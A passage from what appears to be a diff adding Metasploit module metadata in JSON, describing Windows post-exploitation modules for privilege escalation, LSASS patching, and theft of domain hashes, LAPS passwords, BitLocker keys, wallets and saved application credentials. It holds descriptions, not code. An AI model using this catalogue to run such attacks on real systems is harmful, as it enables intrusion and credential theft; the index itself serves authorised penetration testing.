"windows/escalate/golden_ticket", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/escalate/ms10_073_kbdlayout": { + "name": "Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation", + "fullname": "post/windows/escalate/ms10_073_kbdlayout", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-10-12", + "type": "post", + "author": [ + "Ruben Santamarta", + "jduck " + ], + "description": "This module exploits the keyboard layout vulnerability exploited by Stuxnet. When\n processing specially crafted keyboard layout files (DLLs), the Windows kernel fails\n to validate that an array index is within the bounds of the array. By loading\n a specially crafted keyboard layout, an attacker can execute code in Ring 0.", + "references": [ + "OSVDB-68552", + "CVE-2010-2743", + "MSB-MS10-073", + "URL-https://web.archive.org/web/20160308010201/http://www.reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1", + "EDB-15985" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/escalate/ms10_073_kbdlayout.rb", + "is_install_path": true, + "ref_name": "windows/escalate/ms10_073_kbdlayout", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-down" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/escalate/screen_unlock": { + "name": "Windows Escalate Locked Desktop Unlocker", + "fullname": "post/windows/escalate/screen_unlock", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "L4teral ", + "Metlstorm" + ], + "description": "This module unlocks a locked Windows desktop by patching\n the respective code inside the LSASS.exe process. This\n patching process can result in the target system hanging or\n even rebooting, so be careful when using this module on\n production systems.", + "references": [ + "URL-http://www.storm.net.nz/projects/16" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/escalate/screen_unlock.rb", + "is_install_path": true, + "ref_name": "windows/escalate/screen_unlock", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-down" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/escalate/unmarshal_cmd_exec": { + "name": "Windows unmarshal post exploitation", + "fullname": "post/windows/escalate/unmarshal_cmd_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-08-05", + "type": "post", + "author": [ + "Nicolas Joly", + "Matthias Kaiser", + "Sanjay Gondaliya", + "Pratik Shah " + ], + "description": "This module exploits a local privilege escalation bug which exists\n in Microsoft COM for Windows when it fails to properly handle serialized objects.", + "references": [ + "CVE-2018-0824", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824", + "URL-https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn", + "EDB-44906" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/escalate/unmarshal_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/escalate/unmarshal_cmd_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/ad_to_sqlite": { + "name": "AD Computer, Group and Recursive User Membership to Local SQLite DB", + "fullname": "post/windows/gather/ad_to_sqlite", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will gather a list of AD groups, identify the users (taking into account recursion)\n and write this to a SQLite database for offline analysis and query using normal SQL syntax.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/ad_to_sqlite.rb", + "is_install_path": true, + "ref_name": "windows/gather/ad_to_sqlite", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/arp_scanner": { + "name": "Windows Gather ARP Scanner", + "fullname": "post/windows/gather/arp_scanner", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will perform an ARP scan for a given IP range through a\n Meterpreter session.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/arp_scanner.rb", + "is_install_path": true, + "ref_name": "windows/gather/arp_scanner", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/avast_memory_dump": { + "name": "Avast AV Memory Dumping Utility", + "fullname": "post/windows/gather/avast_memory_dump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "DLL_Cool_J" + ], + "description": "This module leverages an Avast Anti-Virus memory dump utility that is shipped\n by default with Avast Anti-Virus Home software suite.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/windows/gather/avast_memory_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/avast_memory_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/bitcoin_jacker": { + "name": "Windows Gather Bitcoin Wallet", + "fullname": "post/windows/gather/bitcoin_jacker", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "illwill ", + "todb " + ], + "description": "This module downloads any Bitcoin wallet files from the target\n system. It currently supports both the classic Satoshi wallet and the\n more recent Armory wallets. Note that Satoshi wallets tend to be\n unencrypted by default, while Armory wallets tend to be encrypted by default.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/bitcoin_jacker.rb", + "is_install_path": true, + "ref_name": "windows/gather/bitcoin_jacker", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/bitlocker_fvek": { + "name": "Bitlocker Master Key (FVEK) Extraction", + "fullname": "post/windows/gather/bitlocker_fvek", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Danil Bazin " + ], + "description": "This module enumerates ways to decrypt Bitlocker volume and if a recovery key is stored locally\n or can be generated, dump the Bitlocker master key (FVEK)", + "references": [ + "URL-https://github.com/libyal/libbde/blob/master/documentation/BitLocker Drive Encryption (BDE) format.asciidoc", + "URL-https://web.archive.org/web/20170914195545/http://www.hsc.fr/ressources/outils/dislocker/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-03 12:57:40 +0000", + "path": "/modules/post/windows/gather/bitlocker_fvek.rb", + "is_install_path": true, + "ref_name": "windows/gather/bitlocker_fvek", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/bloodhound": { + "name": "BloodHound Ingestor", + "fullname": "post/windows/gather/bloodhound", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h4ng3r ", + "h00die" + ], + "description": "This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more.\n With this information BloodHound will easily identify highly complex attack paths that would otherwise be impossible to quickly\n identify within an Active Directory environment.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/bloodhound.rb", + "is_install_path": true, + "ref_name": "windows/gather/bloodhound", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "sharphound" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Stability": [ + "crash-safe" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/cachedump": { + "name": "Windows Gather Credential Cache Dump", + "fullname": "post/windows/gather/cachedump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Maurizio Agazzini ", + "mubix " + ], + "description": "This module uses the registry to extract the stored domain hashes that have been\n cached as a result of a GPO setting. The default setting on Windows is to store\n the last ten successful logins.", + "references": [ + "URL-https://web.archive.org/web/20220407023137/https://lab.mediaservice.net/code/cachedump.rb" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/cachedump.rb", + "is_install_path": true, + "ref_name": "windows/gather/cachedump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/checkvm": { + "name": "Windows Gather Virtual Environment Detection", + "fullname": "post/windows/gather/checkvm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "Aaron Soto " + ], + "description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Hyper-V, VMWare, VirtualBox, Xen, QEMU,\n and Parallels.", + "references": [ + "URL-https://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf", + "URL-https://www.heise.de/security/downloads/07/1/1/8/3/5/5/9/vmde.pdf", + "URL-https://evasions.checkpoint.com/techniques/registry.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/checkvm.rb", + "is_install_path": true, + "ref_name": "windows/gather/checkvm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/adi_irc": { + "name": "Adi IRC credential gatherer", + "fullname": "post/windows/gather/credentials/adi_irc", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jacob Tierney", + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on AdiIRC Client in a windows remote host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/adi_irc.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/adi_irc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/aim": { + "name": "Aim credential gatherer", + "fullname": "post/windows/gather/credentials/aim", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Aim credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/aim.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/aim", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/avira_password": { + "name": "Windows Gather Avira Password Extraction", + "fullname": "post/windows/gather/credentials/avira_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Robert Kugler / robertchrk" + ], + "description": "This module extracts the weakly hashed password\n which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/avira_password.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/avira_password", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/bulletproof_ftp": { + "name": "Windows Gather BulletProof FTP Client Saved Password Extraction", + "fullname": "post/windows/gather/credentials/bulletproof_ftp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "juan vazquez " + ], + "description": "This module extracts information from BulletProof FTP Bookmarks files and store\n retrieved credentials in the database.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/bulletproof_ftp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/bulletproof_ftp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/carotdav_ftp": { + "name": "CarotDAV credential gatherer", + "fullname": "post/windows/gather/credentials/carotdav_ftp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jacob Tierney", + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on CarotDAV FTP Client in a windows remote host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/carotdav_ftp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/carotdav_ftp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/chrome": { + "name": "Chrome credential gatherer", + "fullname": "post/windows/gather/credentials/chrome", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Chrome in a windows remote host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/chrome.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/chrome", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/comodo": { + "name": "Comodo credential gatherer", + "fullname": "post/windows/gather/credentials/comodo", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored in Comodo on a remote Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/comodo.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/comodo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/coolnovo": { + "name": "Coolnovo credential gatherer", + "fullname": "post/windows/gather/credentials/coolnovo", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Coolnovo credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/coolnovo.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/coolnovo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/coreftp": { + "name": "Windows Gather CoreFTP Saved Password Extraction", + "fullname": "post/windows/gather/credentials/coreftp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts saved passwords from the CoreFTP FTP client. These\n passwords are stored in the registry. They are encrypted with AES-128-ECB.\n This module extracts and decrypts these passwords.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/coreftp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/coreftp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/credential_collector": { + "name": "Windows Gather Credential Collector", + "fullname": "post/windows/gather/credentials/credential_collector", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "tebo " + ], + "description": "This module harvests credentials found on the host and stores them in the database.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/credential_collector.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/credential_collector", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/digsby": { + "name": "Digsby credential gatherer", + "fullname": "post/windows/gather/credentials/digsby", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Digsby credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/digsby.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/digsby", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/domain_hashdump": { + "name": "Windows Domain Controller Hashdump", + "fullname": "post/windows/gather/credentials/domain_hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module attempts to copy the NTDS.dit database from a live Domain Controller\n and then parse out all of the User Accounts. It saves all of the captured password\n hashes, including historical ones.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/domain_hashdump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/domain_hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/dynazip_log": { + "name": "Windows Gather DynaZIP Saved Password Extraction", + "fullname": "post/windows/gather/credentials/dynazip_log", + "aliases": [], + "rank": 300, + "disclosure_date": "2001-03-27", + "type": "post", + "author": [ + "bcoles " + ], + "description": "This module extracts clear text credentials from dynazip.log.\n The log file contains passwords used to encrypt compressed zip\n files in Microsoft Plus! 98 and Windows Me.", + "references": [ + "CVE-2001-0152", + "MSB-MS01-019", + "PACKETSTORM-24543", + "URL-https://support.microsoft.com/en-us/kb/265131" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/dynazip_log.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/dynazip_log", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/dyndns": { + "name": "Windows Gather DynDNS Client Password Extractor", + "fullname": "post/windows/gather/credentials/dyndns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Shubham Dawra ", + "sinn3r " + ], + "description": "This module extracts the username, password, and hosts for DynDNS version 4.1.8.\n This is done by downloading the config.dyndns file from the victim machine, and then\n automatically decode the password field. The original copy of the config file is also\n saved to disk.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/dyndns.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/dyndns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/enum_cred_store": { + "name": "Windows Gather Credential Store Enumeration and Decryption Module", + "fullname": "post/windows/gather/credentials/enum_cred_store", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kx499" + ], + "description": "This module will enumerate the Microsoft Credential Store and decrypt the\n credentials. This module can only access credentials created by the user the\n process is running as. It cannot decrypt Domain Network Passwords, but will\n display the username and location.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/enum_cred_store.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/enum_cred_store", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/enum_laps": { + "name": "Windows Gather Credentials Local Administrator Password Solution", + "fullname": "post/windows/gather/credentials/enum_laps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will recover the LAPS (Local Administrator Password Solution) passwords,\n configured in Active Directory, which is usually only accessible by privileged users.\n Note that the local administrator account name is not stored in Active Directory,\n so it is assumed to be 'Administrator' by default.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/enum_laps.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/enum_laps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/enum_picasa_pwds": { + "name": "Windows Gather Google Picasa Password Extractor", + "fullname": "post/windows/gather/credentials/enum_picasa_pwds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Unknown", + "Sil3ntDre4m " + ], + "description": "This module extracts and decrypts the login passwords\n stored by Google Picasa.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/enum_picasa_pwds.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/enum_picasa_pwds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/epo_sql": { + "name": "Windows Gather McAfee ePO 4.6 Config SQL Credentials", + "fullname": "post/windows/gather/credentials/epo_sql", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nathan Einwechter " + ], + "description": "This module extracts connection details and decrypts the saved password for the\n SQL database in use by a McAfee ePO 4.6 server. The passwords are stored in a\n config file. They are encrypted with AES-128-ECB and a static key.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/epo_sql.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/epo_sql", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/filezilla_server": { + "name": "Windows Gather FileZilla FTP Server Credential Collection", + "fullname": 